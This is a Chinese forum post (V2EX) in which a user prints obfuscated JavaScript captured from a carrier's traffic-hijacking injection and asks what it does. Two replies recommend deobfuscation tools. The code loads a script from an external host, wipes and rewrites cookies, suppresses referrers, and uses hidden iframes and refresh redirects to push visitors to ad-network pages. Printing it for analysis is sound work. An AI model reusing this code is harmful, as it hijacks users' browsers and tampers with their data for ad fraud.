懂 javascript 的进来瞧瞧……

2015-12-13 04:16:09 +08:00
 wangluowangwang

这段代码何用?从电信劫持的数据包里面提取的。顺序是旁路设备 输入网址,先将目标劫持到此(内容如下),下一个数据包就是跳转到广告联盟的,再下一个数据包是再跳转一次。

eval(function(p, a, c, k, e, r) {
e = function(c) {
return (c < 62 ? '': e(parseInt(c / 62))) + ((c = c % 62) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if ("0".replace(0, e) == 0) {
while (c--) r[e(c)] = k[c];
k = [function(e) {
return r[e] || e
}];
e = function() {
return "[235-8v-yA-FH-O]"
};
c = 1
};
while (c--) if (k[c]) p = p.replace(new RegExp("\b" + e(c) + "\b", "g"), k[c]);
return p
} ("(5(h,g,o,p,q,f,i){8 r=g.A('head')[0],s=h.opera,l=(5(a){3(!a||/([^:]|^)\/\//.B(a)||~a.x('IPADDRESS:PORT')){2 0}a=(5(d){8 e=d[1]||'',b=e||'=';2~b.x('=')?(d[0]||'')+'?//='+(e?'&'+e:''):a})(a.C('?'));3(!a.lastIndexOf('/')){2 a.y(o,p)}2 a.D(0,1)+a.D(1).y(o,p)})((5(d,e,b){3(d){f=d.6;i=d.v;2 d.7}E{Z.G.Y()}F(c){b=c.stack||c.fileName||c.sourceURL||c.stacktrace;3(!b&&s){b=((''+c).match(/of linked w \S+/g)||[]).join(' ')}}3(b){b=b.C(/[@ ]/g).pop();b=b[0]=='('?b.slice(1,-1):b;H(8 a=b.y(/(:\d+)?:\d+$/i,''),k,t=e.I;t--;){k=e[t];3(a==k.7){f=k.6;i=k.v;break}}2 a}H(8 m=(e[e.I-1]||{}),u=0,j;j=e[u++];){3(j.readyState=='interactive'){f=j.6;i=j.v;2 j.7}}f=m.6;i=m.v;2 m.7})(g.currentScript,g.A(q))),n=g.createElement(q);l&&(f&&(n.6=f),(n.7=l),~String(g.J).x('[native code]')&&!i?g.J('<w 7=\"'+l+'\"'+(f?' 6=\"'+f+'\"':'')+'><\/w>'):r.insertBefore(n,r.firstChild));3(h.K||((+L M)-(/^(1[4-9]\d{11})$/.B(h.N)&&RegExp.$1||0))/1e3<10){2 0}K=1;h.N=(+L M);h.onerror=5(){2!0};2!s&&(5(d){E{d=top.O.host}F(z){}2 d})()&&!/p21420=1/.B(g.cookie)})(self,document,/([^:\/]|^)\//,'$1//','w')&&navigator.cookieEnabled&&O.protocol=='http:'", [], 51, "||return|if||function|charset|src|var|||||||||||||||||||||||async|script|indexOf|replace||getElementsByTagName|test|split|substr|try|catch||for|length|writeln|lks|new|Date|name|location".split("|"), 0, {})) && ~
function(p, g, i, s, J, t, K, L, u) {
var F = !!p.updateCommands,
M = p.openDatabase,
N = p.localStorage,
m = p.encodeURIComponent,
P = g.URL,
v = g.location,
bc = v.hostname,
Q = v.pathname.substr(1),
w = v.search.substr(1),
bd = P.split('#')[0],
R = bd.split('?')[0],
S = 100 * Math.random() | 0,
T = 3 + 3,
be = (function(a) {
i = a(i);
return a
})(function(c) {
for (var d, h = String.fromCharCode,
f = 'abcdefghijklmnopqrstuvwxyz',
j = f.toUpperCase() + f + '0123456789+/=', l, q, o, x, U, G, H, y, A = [], k = 0, V = new RegExp(f, 'g'), r = c.split('').reverse().join(f).replace(V, '').replace(/@([012])/g,
function(a, b) {
return ['/', '+', '='][1 * b]
}), bf = r.length; k < bf; k += 4) {
x = j.indexOf(r.charAt(k));
U = j.indexOf(r.charAt(k + 1));
G = j.indexOf(r.charAt(k + 2));
H = j.indexOf(r.charAt(k + 3));
y = x << 18 | U << 12 | G << T | H;
l = y >>> 16 & 0xff;
q = y >>> 8 & 0xff;
o = y & 0xff;
A[k / 4] = h(l, q, o);
if (H == 0x40) A[k / 4] = h(l, q);
if (G == 0x40) A[k / 4] = h(l)
}
d = A.join(f).replace(V, '');
try {
return eval('(' + d + ')')
} catch(m) {}
return d
}),
B = i[2],
n = i[T],
C = i[8],
W = 'r' + C,
X = Q.split('/').slice(0, -1),
D = function(a, b, c) {
for (var d = 'path=',
h = 'domain=',
f = [m(a || W) + '=' + m(b || g.referrer), d + '/'], j = (c && f.push('expires=Thu, 01 Jan 1970 00:00:00 GMT'), f.length), l = bc.split('.'), q = l.length; q--;) {
f[1] = d + '/';
g.cookie = f.join('; ');
for (var o = 0,
x = X.length; o < x; o++) {
f[1] += X[o] + '/';
g.cookie = f.join('; ')
}
f[j] = h + l.join('.');
l.shift()
}
},
bg = /img|.(png|ico|gif|jpe?g)$/i,
bh = /^\w$/,
bi = function() {
n = (/^[1-9]\d+$/.test(n) ? be('2@0DZpZCelRmbp9ldkF2Ly9GdjVGdlR0aj9GbCRWYvIXZ5FGbwRWYv42YuYHduNmL981PwhGcuM2Lv02bj5ie652Yuc3LvoDc0RHa') : '') + n;
return n && (bg.test(n) ? ((new Image()).src = n) : !F && (g.getElementsByTagName('head')[0].appendChild(g.createElement('script')).src = n))
},
E = '<meta name="referrer" content="never">',
Y = function(a) {
return 'data:text/html;charset=utf-8,' + m('<html><head>' + E + '<meta http-equiv="refresh" content="0;url=' + a + '"></head><body></body></html>')
},
Z = function(d) {
var h = function() {
D(C, 1);
M || F ? ~
function(a, b, c) {
a.rel = 'noreferrer';
a.href = Y(d);
a.target = '_top';
c.insertBefore(a, c.firstChild);
try {
a.click()
} catch(e) {
b.initEvent('click', !1, !1);
a.dispatchEvent(b)
}
} (g.createElement('area'), g.createEvent('Event'), g.body) : (~String(g.write).indexOf('[native code]') || ~
function(a, b, c) {
try {
a.style.display = 'none';
b.insertBefore(a, b.firstChild);
c = a.contentWindow.document;
c.open();
c.write('<script>parent.document.write=document.write;<\/script>');
c.close()
} catch(O) {
top.location = d
}
} (g.createElement('iframe'), g.body), ~
function() {
try { (L = g.open('text/html', 'replace')).write(E + '<meta http-equiv="refresh" content="0;url=' + d + '">');
L.close()
} catch(z) {
setTimeout(arguments.callee, 64)
}
} ())
};
J ? setTimeout(function() {
h()
},
300) : h()
},
I = /([^=&]+)=([^&]*)(?:&|$)/g,
ba = new RegExp(i[10], 'i'),
bb = g.cookie;
switch ((function(d) {
d = (new RegExp(i[3], 'i')).test(w) || (new RegExp(i[4], 'i')).test(decodeURIComponent(bb)) || (new RegExp(i[5], 'i')).test(P) || i[1 * (!w && !(Q + v.hash.substr(1)))] <= S;
if (d) {
return d
} else {
J = i[7] > S && bi();
return~
function() {
t && clearTimeout(t);
t = null;
N && (N.clear(), sessionStorage.clear());
for (var a = g.cookie.split('; '), b = a.length, c; b--;) {
c = a[b].split('=');
if (bh.test(c[1]) || ~c[0].indexOf(C)) {
continue
}
D(c[0], '', 1)
}
if ('complete' == g.readyState) {
K = 1;
return D(C, 1)
}
t = setTimeout(arguments.callee, 100)
} () && i[3 * 3]
}
})(~bb.indexOf(W) || D())) {
case 0:
u = (function(a, b, c, d, h) {
while ((c = I.exec(w)) != null) {
h = c[1];
ba.test(h) || (a[h] = c[2])
}
for (var f in a) {
d = a[f];
d && a.hasOwnProperty(f) && b.push(f + '=' + d)
}
return R + '?' + b.join('&')
})({},
[]);
Z(B.replace(/@@(DD?EST|RAW)URL@@/g,
function(a, b) {
return {
RAW: u,
DEST: m(u),
DDEST: m(m(u))
} [b]
}));
break;
case 1:
~
function() {
s && clearTimeout(s);
s = null;
if (K) {
return~
function(b, c, d, h) {
var f = g.getElementsByTagName('base'),
j = f[f.length - 1];
try {
b = g.createElement('<iframe name=\'' + d + '\'>')
} catch(e) {}
b.style.cssText = 'position:absolute;width:100%;height:100%;left:-100000000px';
c.insertBefore(b, c.firstChild);
if (j) {
h = j.target;
j.setAttribute('target', '_self')
}
if (b.attachEvent) {
b.attachEvent('onload',
function() {
h && j.setAttribute('target', h);
b.onload = null
})
} else {
b.onload = function() {
h && j.setAttribute('target', h);
b.onload = null
}
}
b.contentWindow.name = d;
b.src = 'javascript:void(~function(l){l.open();' + ((function(a) {
try {
b.contentWindow.document
} catch(p) {
a = 1
}
return a
})(0) ? 'l.domain="' + g.domain + '";': '') + 'l.write(self.name);l.close()}(document))'
} (g.createElement('iframe'), g.body, M || F ? '<html><head>' + E + '</head><body></body><script>~function(a,b){a.rel="noreferrer";a.href="' + Y(B) + '";document.body.appendChild(a);try{a.click()}catch(e){b.initEvent("click",!1,!1);a.dispatchEvent(b)}}(document.createElement("a"),document.createEvent("Event"))<\/script></html>': E + '<meta http-equiv="refresh" content="0;url=' + B + '">')
}
s = setTimeout(arguments.callee, 100)
} ();
break;
case 2:
Z((function(a, b, c, d, h) {
while ((c = I.exec(w)) != null) {
h = c[1];
ba.test(h) || (a[h] = c[2])
}
while ((c = I.exec(B)) != null) {
a[c[1]] = c[2]
}
for (var f in a) {
d = a[f];
d && a.hasOwnProperty(f) && b.push(f + '=' + d)
}
return R + '?' + b.join('&')
})({},
[]));
break
}
} (self, document, '2@01JnwSMscCMyQTMyA3JsATOscCO5YzM4ADMzcCLn02bj5COlh2YhlGeuc3d3dCLnQyIedCLnQyIedCLnQ0M1ITJENTNyUSUCxEdGRVUwdGRBBXVRVlUwMkRCJkRDRWMXR2MlQnNyUCRzUjMlQ0M1ITJBhEbGFlRCFEeVRWSsFkUzFURlRnUaNTTCJWZ0dVYwMmaJNURod1URZUQVN2dGJnT4ZFSZJlQRRjRIhFZqh0TNVUTCV0UWF2cIRWbVBDTFlkQZNVS3FmQyUjMlk0aHFDe4FmRzBzVNJEbD9UQrNlQSZkUMVVRFVVSwYlYWNkQGFTQXdlSEZkcwJlWQlUeBR2MlAnNyUCZzUSZmNTJjRmamJTJt92YuQmaus2Ypx2Yu42bp5WdmJTJmJTJhNTJwRHdoNyLt92YugTZoNWYphnL3d3dv8iOwRHdodCL1EDLwMzW');

2067 次点击
所在节点    问与答
2 条回复
shiye515
2015-12-13 10:05:24 +08:00
如果谁有闲工夫看,我推荐个工具 http://jsnice.org/
bdbai
2015-12-13 10:18:20 +08:00
标准的 packer 加密,解密一下就行了。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/243143

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX